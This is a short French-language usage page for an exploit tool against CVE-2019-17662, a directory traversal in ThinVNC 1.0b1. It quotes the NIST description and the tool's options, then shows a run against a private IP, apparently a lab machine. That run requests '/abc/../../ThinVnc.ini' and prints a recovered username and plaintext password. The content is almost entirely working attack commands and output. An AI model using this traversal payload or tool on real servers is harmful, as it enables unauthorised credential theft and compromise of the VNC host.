
Exploit pour CVE-2019-17662
ThinVNC 1.0b1 est vulnérable à une lecture de fichier arbitraire, ce qui conduit à un compromis du serveur VNC. La vulnérabilité existe même lorsque l'authentification est activée lors du déploiement du serveur VNC. Le mot de passe d'authentification est stocké en clair dans un fichier qui peut être lu via un vecteur d'attaque de traversée de répertoire ../../ThinVnc.ini.
~ NIST
$ ./bin/CVE-2019-17662 -h
[~] Utilisation : ./bin/CVE-2019-17662 -u URL [-f File]
[>] Options :
OPTIONS Description
-u URL URL de base
-f File [Optionnel] Nom du fichier à interroger (Défaut : ThinVnc.ini)
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] Exploit CVE-2019-17662 par @whokilleddb
[o] Cible : http://10.10.185.214:8080/
[x] Fichier à lire : ThinVnc.ini
[~] Tentative de lecture : http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Tentative de récupération des identifiants
[-] Utilisateur=Atlas
[-] Mot de passe=H0ldUpTheHe@vens